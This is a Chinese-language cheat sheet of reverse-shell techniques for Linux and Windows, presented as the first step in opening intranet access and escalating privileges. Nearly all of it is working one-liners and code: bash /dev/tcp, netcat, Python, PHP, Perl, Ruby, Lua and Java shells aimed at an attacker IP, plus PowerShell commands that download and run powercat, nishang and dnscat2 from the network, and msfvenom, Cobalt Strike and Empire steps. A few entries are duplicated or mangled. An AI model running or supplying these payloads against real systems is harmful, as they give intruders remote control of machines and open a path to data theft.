反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)

0x01 Linux 反弹shell

姿势一:bash反弹

  1. bash -i >& /dev/tcp/192.168.99.242/1234 0>&1
  3. base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
  4. 在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html

其他版本:

  1. exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
  2. exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0
  3. bash -i >& /dev/tcp/192.168.146.129/2333 <&2
  4. nc 192.168.31.174 8080 -t -e /bin/bash

简单解释下:

bash -i 打开一个交互的bash

& 将标准错误输出重定向到标准输出 /dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

姿势二:nc反弹

  1. nc -e /bin/bash 192.168.99.242 1234

姿势三:awk反弹

  1. awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

姿势四:telnet反弹

攻击者主机上打开两个终端分别执行监听:

  1. nc -lvvp 1234
  2. nc -lvvp 4321

备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。

  1. 目标主机中执行:
  2. telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip
反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。
另一个版本:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p

Netcat without -e #1

  1. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f

Netcat without -e #2

  1. nc localhost 443 | /bin/sh | nc localhost 444
  2. telnet localhost 443 | /bin/sh | telnet localhost 444

XTerm

  1. xterm -display 10.0.0.1:1

JDWP RCE

  1. print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())

Working with Restricted Shells

  1. print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())

姿势五:socat反弹

  1. socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

姿势六:Python反弹

  1. python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

姿势七:PHP反弹

  1. php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

姿势八:Perl反弹

  1. 方法一:
  2. perl -e 'use Socket;$i="192.168.99.242";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  4. 方法二:
  5. perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

姿势九:Ruby反弹

  1. 方法一:
  2. ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
  4. 方法二:
  5. ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

姿势十:Lua反弹

  1. lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

姿势十一:JAVA反弹

  1. public class Revs {
  2.     /**
  3.     * @param args
  4.     * @throws Exception 
  5.     */
  6. public static void main(String[] args) throws Exception {
  7.         // TODO Auto-generated method stub
  8.         Runtime r = Runtime.getRuntime();
  9.         String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
  10.         Process p = r.exec(cmd);
  11.         p.waitFor();
  12.     }
  13. }

保存为Revs.java文件,编译执行,成功反弹shell。

  1. javac Revs.java 
  2. java Revs

0x02 Windows反弹shell

姿势一:nc反弹

  1. netcat 下载:https://eternallybored.org/misc/netcat/
  2. 服务端反弹:nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe

姿势二:powershell反弹

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。

  1. PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.99.242 -p 1234 -e cmd

下载到目标机器本地执行:

  1. PS C:\WWW> Import-Module ./powercat.ps1
  2. PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

姿势三:MSF反弹shell

使用msfvenom生成相关Payload

  1. msfvenom -l payloads | grep 'cmd/windows/reverse'
  2. msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

姿势四:Cobalt strike反弹shell

  1. 1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add
  2. 2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置。
  3. 3、目标机执行powershell payload

姿势五:Empire反弹shell

  1. usestager windows/launcher_vbs
  2. info
  3. set Listener test
  4. execute

姿势六:nishang反弹shell

Reverse TCP shell:

  1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234

Reverse UDP shell:

  1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');
  2. Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234

姿势七:Dnscat反弹shell

github项目地址:https://github.com/iagox86/dnscat2
服务端:

  1. ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open

目标主机:

  1. powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx